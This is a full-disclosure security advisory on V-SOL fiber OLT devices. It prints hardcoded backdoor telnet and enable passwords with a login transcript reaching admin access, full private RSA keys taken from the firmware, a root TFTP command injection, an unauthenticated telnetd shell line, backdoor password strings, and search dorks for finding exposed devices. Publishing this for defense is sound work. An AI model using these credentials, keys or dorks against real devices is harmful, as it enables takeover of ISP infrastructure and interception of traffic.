V-SOL OLTs Backdoor / Privilege Escalation

Various V-SOL OLTs suffer from multiple backdoor issues, hardcoded RSA keys, potential command injection, and insecure management vulnerabilities.


MD5 | d122b428606a083cd3a8e39e652a2acc

Hello,

Please find a text-only version below sent to security mailing lists.

The complete version on "Multiple vulnerabilities found in V-SOL OLTs"
is posted here:
https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html


=== text-version of the advisory ===

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512


## Advisory Information

Title: Multiple vulnerabilities found in V-SOL OLTs
Advisory URL: https://pierrekim.github.io/advisories/2020-v-sol-0x00-olt.txt
Blog URL: https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html
Date published: 2020-07-14
Vendors contacted: None
Release mode: Full-Disclosure
CVE: None yet assigned



## Product Description

The V-SOL OLTs are FTTH OLTs allowing to provide FTTH connectivity to
a large number of clients (using ONTs).
Some of the devices support multiple 10-gigabit uplinks and provide
Internet connectivity to up to 1024 ONTs (clients).

We validated the vulnerabilities against V1600D4L OLT in our lab
environment with the latest firmware versions (V1.01.49).

Using static analysis, these vulnerabilities also appear to affect all
available OLT models as the codebase is similar:

- - V1600D (V2.03.69 and V2.03.57)
- - V1600D4L (V1.01.49)
- - V1600D-MINI (V1.01.48)
- - V1600G1 (V2.0.7 and V1.9.7)
- - V1600G2 (V1.1.4)

We believe these models are also vulnerable:

- - V1600D2-L
- - V1600D2
- - V1600D4
- - V1600D4-DP
- - V1600D8
- - V1600D16
- - V1600G0


For explanation about FTTH architecture, you can check my previous
research at http://pierrekim.github.io/blog/2016-11-01-gpon-ftth-networks-insecurity.html
.



## Vulnerabilities Summary

The summary of the vulnerabilities is:
1. Backdoor Access with telnet
2. Enable Backdoor
3. Hardcoded RSA keys
4. Potential command injection
5. Code quality
6. Backdoor used for account creation
7. Backdoor specific to V1600D model
8. Insecure management interfaces


## Details - Backdoor Access with telnet

A telnet server is running in the appliance and is reachable from the
WAN interface and from the FTTH LAN interface (from the ONTs).

You can find below backdoor (undocumented) credentials, giving an
attacker a low-privilege CLI access.

login: admin
password: [email protected]#y$z%x6x7q8c9z)


The credentials have been extracted from firmware images:

[please use the HTML version at
https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html
to see the image]
Authentication process with hardcoded credentials


$ telnet [ip]
Trying [ip]...
Connected to [ip].
Escape character is '^]'.

Hello, this is epon olt platform (version 1.00).
Copyright 2010-2018,All Rights Reserved.


User Access Verification

Bad UserName or Bad Password , Login Failed.

Please retry

Login: admin
Password: [email protected]#y$z%x6x7q8c9z)

olt> list
enable Turn on privileged mode command
exit Exit current mode and down to previous mode
help Description of the interactive help system
list Print command list
quit Exit current mode and down to previous mode
show Show running system information
terminal Set terminal line parameters
vty Virtual terminal
who Display who is on vty
olt>



## Details - Enable Backdoor

It is possible to elevate the privileges using the password
`[email protected]#y$z%x6x7q8c9z)` and to get a complete administrator CLI access:

olt> enable
Password: [email protected]#y$z%x6x7q8c9z)
olt#
clear Reset functions
configure Configuration from vty interface
copy Copy configuration
disable Turn off privileged mode command
end Exit current mode and down to previous mode
exit Exit current mode and down to previous mode
help Description of the interactive help system
ip Global IP configuration subcommands
list Print command list
no Negate a command or set its defaults
quit Exit current mode and down to previous mode
show Show running system information.
terminal Set terminal line parameters
vty Virtual terminal
who Display who is on vty
write Write running configuration to memory, network, or terminal
olt#


With this access, an attacker can completely overwrite the
configuration as well as the firmware.

[please use the HTML version at
https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html
to see the image]
Hardcoded Enable password



## Details - Hardcoded RSA keys

The firmware images contain hardcoded RSA keys, used to provide SSL
encryption for the web server.

V1600D4L and V1600D-MINI:

$ cat self.key
-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQDPca1RbgPDdqZ2n2m1PQ/s2IANv55GJhKF9CtkMIEpHEhbTixH
pcNE02oQoJFTK5EL21A3JftekVk3DCKK68ncIJAAWmzJp63QpEovZr9ySQubkk39
/+kHxsfkUmR3SldyLctaT+o7qAy4W/BM6tp00mXWKhFHerXmABf/vGt89QIDAQAB
AoGAe3cvLs4J02ZlASk0Iziqp87buFMaAqpaT/vZb5Im7a71qdJHLIWOSQKDmE3Y
8OV3ONVZUtl6WPitXsQMMx7PTvCELDvNMGmGJ31zOpE1zXl8vlh5QQzTfLZxjE1r
SfWXoYNUcV4uiOfXNgJaOBzz4l8W8CjE6TyDF0DD3WsdQMECQQDpTMo5VD9ifaoW
r1nahaaVTPyTyd7GQgO7jyXIdlZ+mL0G8xUF6CnIw1G3kG+6l4oLsAqpj2SIFOcn
rz/Zxq89AkEA46DZRloNL6hNEWZvL9dboqp/7f4sILItE6WfANsqM5oeIPA1T3ge
nYK5VwU2Jm4N3oaLq9fPfESWtAC/5FvgGQJAGcthuID2GR+nxKZSmvSX/H3slzKE
rQrzerNTDBz5Zznf/Hq34lVO+WGPEWqoz8qderlWFHVEOj+FZz/bIWr0SQJAJk6K
YhmDgJKtLZF0grOWW0CgONf+ax4xEc5cfNNlPbvg+CAUiKQpWs6GDEv3Oe5pbRpt
ZOTzqPEN/4rkwDRp+QJBAOZUwGwi3pHU8T9K15qR1Em/o+buRoc8hFyyv1CSmAWZ
uXFnRzbruUlQ6/lMF3MU7U4TTOD7tnhOVq1Ub+Rgnzs=
-----END RSA PRIVATE KEY-----
$ cat self.crt
-----BEGIN CERTIFICATE-----
MIICkDCCAfmgAwIBAgIJALvknsR/6Fr2MA0GCSqGSIb3DQEBBQUAMGExCzAJBgNV
BAYTAi4uMQswCQYDVQQIDAIuLjELMAkGA1UEBwwCLi4xCzAJBgNVBAoMAi4uMQsw
CQYDVQQLDAIuLjELMAkGA1UEAwwCLi4xETAPBgkqhkiG9w0BCQEWAi4uMB4XDTE4
MDcyNjA5MDEwMloXDTIxMDcyNTA5MDEwMlowYTELMAkGA1UEBhMCLi4xCzAJBgNV
BAgMAi4uMQswCQYDVQQHDAIuLjELMAkGA1UECgwCLi4xCzAJBgNVBAsMAi4uMQsw
CQYDVQQDDAIuLjERMA8GCSqGSIb3DQEJARYCLi4wgZ8wDQYJKoZIhvcNAQEBBQAD
gY0AMIGJAoGBAM9xrVFuA8N2pnafabU9D+zYgA2/nkYmEoX0K2QwgSkcSFtOLEel
w0TTahCgkVMrkQvbUDcl+16RWTcMIorrydwgkABabMmnrdCkSi9mv3JJC5uSTf3/
6QfGx+RSZHdKV3Ity1pP6juoDLhb8Ezq2nTSZdYqEUd6teYAF/+8a3z1AgMBAAGj
UDBOMB0GA1UdDgQWBBTDWRDTYuzjtF3+rk0jaBTKRIMtXjAfBgNVHSMEGDAWgBTD
WRDTYuzjtF3+rk0jaBTKRIMtXjAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUA
A4GBAJgxXbMJQYEXOvrP5PcCUkq16o5bt83x3xCkZ9+Yv7cnCRsRBAgXSMyorOMl
+Ttt3CSTNp5jwHcDhysth4V5/SSkJ46DkUmID2WzzxIjL82MOYAv/na6QTGNUAcz
7VLEX/QuBzS7jLczZ9WtOrgZ0ma2TjIZJOpT32guKZYeyL+r
-----END CERTIFICATE-----


V1600D, V1600G1 and V1600G2:

$ cat usr/sbin/self.key
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDQYaaee6igp8RpOXUq+82WUOXm8pSjIXBj6U9RRki9kLcu8vV/
80g/vdyPdartkhvG7tG5kJLSZ464+uDNbZpnEk4LZbN9vAY8rgmc/2SFYFYiKb82
bcKpV6e4EuCXc0VPC27zlywikVFHg2g9Dva6bnuPqXj+JRUNK/ER4PADTwIDAQAB
AoGAC0Mb1DjutjAbB2zZjkcpp1Qb+M1nhyGJh3zWkpfv2n71x43OAupNH1TNlNtR
L6HT6n6ByzurE8AREKJOgAvKamqiyPM8kPZKFEeBqqDOhm3ZXOsjsS5okpzMR4H4
CHbJO8dm1siM3fKG2UdrSGiwJw27wB1NRRcocQkcixIez9ECQQD5XTxUhe/CGPAF
AA4q8srNvkG5oRd1eVLr6cyoEzbqwd3VnVHUzIn3fBYul1T3pZUkNF9RrmFENPTA
Sf5P+DBtAkEA1e05mYZLa8IJnlgvGlLZn8Mvwpy5fNuMrEqwtiWFn6naG8FIwosR
7FBdQWfUlCslu2dKSTx9n9x3tkV9w2zFKwJBANWrinJygcqzS5c9QOaUPCqnh/Hj
kxJZ7y+ummq6bCgkDk1oDCJnUSD69pbdnTTGcVEgfzyiSz4CkmXiAUPMytECQE+c
YbQdgxHN+xBfVuAf9vb6h1qQQoMRnU882HhgjFK3vgBYNMCZSok7+whtIHIngHo2
XTHV/hYw0KgXQk8oulMCQQDJD7WusXmuND+PQp24/t19d/FyhITHc/CDwsKN6tW0
8WfkCwMgDBqDiBtBd/S2gs6yJVpaP3HKE+Sl5cB4mPVK
-----END RSA PRIVATE KEY-----
$ cat usr/sbin/self.crt
-----BEGIN CERTIFICATE-----
MIICkDCCAfmgAwIBAgIJAOkwF33vgssHMA0GCSqGSIb3DQEBBQUAMGExCzAJBgNV
BAYTAi4uMQswCQYDVQQIDAIuLjELMAkGA1UEBwwCLi4xCzAJBgNVBAoMAi4uMQsw
CQYDVQQLDAIuLjELMAkGA1UEAwwCLi4xETAPBgkqhkiG9w0BCQEWAi4uMB4XDTE4
MDcyNzA4MTMxNVoXDTIxMDcyNjA4MTMxNVowYTELMAkGA1UEBhMCLi4xCzAJBgNV
BAgMAi4uMQswCQYDVQQHDAIuLjELMAkGA1UECgwCLi4xCzAJBgNVBAsMAi4uMQsw
CQYDVQQDDAIuLjERMA8GCSqGSIb3DQEJARYCLi4wgZ8wDQYJKoZIhvcNAQEBBQAD
gY0AMIGJAoGBANBhpp57qKCnxGk5dSr7zZZQ5ebylKMhcGPpT1FGSL2Qty7y9X/z
SD+93I91qu2SG8bu0bmQktJnjrj64M1tmmcSTgtls328BjyuCZz/ZIVgViIpvzZt
wqlXp7gS4JdzRU8LbvOXLCKRUUeDaD0O9rpue4+peP4lFQ0r8RHg8ANPAgMBAAGj
UDBOMB0GA1UdDgQWBBQIoRN/VYOmUzwPXlHCZrZi4XPv4zAfBgNVHSMEGDAWgBQI
oRN/VYOmUzwPXlHCZrZi4XPv4zAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUA
A4GBAB0bY8gSse39BwzXtXnzSOpln0CIwjr3xI7nLvzGhf4Xooktf9zDTQBONOzh
eRjSLluVJl9kYIBY4j2Y5nbSwjaWD0Imaa6z5FBro0e3SyGq84tlZyFW8SijdFLC
jN04hXrqdov/ATL6QCaHlGzbPMG4KBiPfwAiiYVlRL3B0vJN
-----END CERTIFICATE-----



## Detail - Potential command injection

It is possible to use TFTP to transfer some files:

upload tftp syslog <filename> <A.B.C.D>
upload tftp configuration <filename> <A.B.C.D>

This is vulnerable to a command injection, allowing to run commands as root.

The function starting the tftp process using system(3) will use the
argument provided by the attacker, as shown below:

[please use the HTML version at
https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html
to see the image]
TFTP command injection



## Detail - Code quality

In the firmware image of V1600D4L and V1600D-MINI, we can find the
following inside the `init.sh` script:

$ cat init.sh
#!/bin/sh
[...]
ifconfig eth0 0.0.0.0
ifconfig eth0 up
[...]

telnetd -l /bin/sh&

During the update, the script appears to start telnetd without authentication.



## Backdoor used for account creation

The string `4ef9cea10b2362f15ba4558b1d5c081f` is being compared with
an input value in the function used to create new users.

The code will check if the user is `admin` or if the backdoor password
`4ef9cea10b2362f15ba4558b1d5c081f` is provided.

It appears it is being used to create admin users from non-admin users.

[please use the HTML version at
https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html
to see the image]
Creation of new user, using a `backdoor` password

Due to time constraints, we did not study this backdoor in depth.



## Backdoor specific to V1600D model

This backdoor appeared in version 2.03.69.

The string `[email protected]$` is being compared with the password
provided by the the remote attacker. If it matches, the access will be
provided.

[please use the HTML version at
https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html
to see the image]
Authentication process with hardcoded credentials

Due to time constraints, we did not study this backdoor in depth.



## Details - Insecure management interfaces

By default, the appliance can only be managed remotely with HTTP,
HTTPS, telnet and SNMP. Some devices may support SSH. Furthermore, SSL
is using hardcoded keys. An attacker can intercept passwords sent in
clear-text and MITM the management of the appliance.



## Dorks

"Hello, this is epon olt platform (version 1.00)."
"Copyright 2010-2018,All Rights Reserved."



## Vendor Response

Full-disclosure is applied as we believe some backdoors are
intentionally placed by the vendor.



## Report Timeline

* Dec 29, 2019: Vulnerabilities found and this advisory was written.
* Jul 14, 2020: A public advisory is sent to security mailing lists.



## Credits

These vulnerabilities were found by Pierre Kim (@PierreKimSec) and
Alexandre Torres (@AlexTorSec).



## References

https://pierrekim.github.io/advisories/2020-v-sol-0x00-olt.txt

https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAl8MX4oACgkQxD4O2n2T
LbymnBAArmUCDEI/WHC5ch31YfXxEhSZOTD1l5GOD7osIixteXT67jCns5EGdhBJ
Lq66KLdjzG+60jhj1N/YHuZBupvF4ChtnTId/UYSjuvys8J17f6VweqsazxebYac
WOcmBwN9Tqw20Bjhmqff3y2qaQ6YpfbkuiPciddLTUT1OGvM8b0wuUDF2grb5KLT
cKJoFW//RaX9eQCZaB/5RoZIv06hZZSx2930ijOfC5kRqoVex5FkhV1dEzA4PBIM
TV/lkYWnOxb6xO6GYwLFGq0xe4qVjd+En34ixgUMhBxsJAQ4HsNGInCgJZfitJKv
0GgNlP5FRtVU+T7kk0e+Bmwl/vAmF3IbCEUacQoW08cahpiqHIJEIKzV+wdYrjlv
q40Ia8pUHwcFEe5UyWn1+yxTU2WslAZQCbXoD0FYrzN6AhgctyZR5kfotSjycGU5
GqxPV7j9HJqahf5rLutbF07onbOxXyU/YwLPx3kbHs3yJ68a1XKZox5o0B3NT/BU
GEUlKnp5C2sZmNXMmdW7bh/MODIgAdK4vfjRgJP77QyHjCed1twqmEFTZ/fy5k+I
gMZCzi/EZhuOAoRximq7Qoxn3TvedmTorCtUrbClMEijQ8weuSxKCUK+joPGmkmv
I46u4GKyS2wmm+2DfQmxSXTZKX689YckXAihgr7bpSDk3yBz12w=
=DOib
-----END PGP SIGNATURE-----

--
Pierre Kim
[email protected]
@PierreKimSec
https://pierrekim.github.io/



Related Posts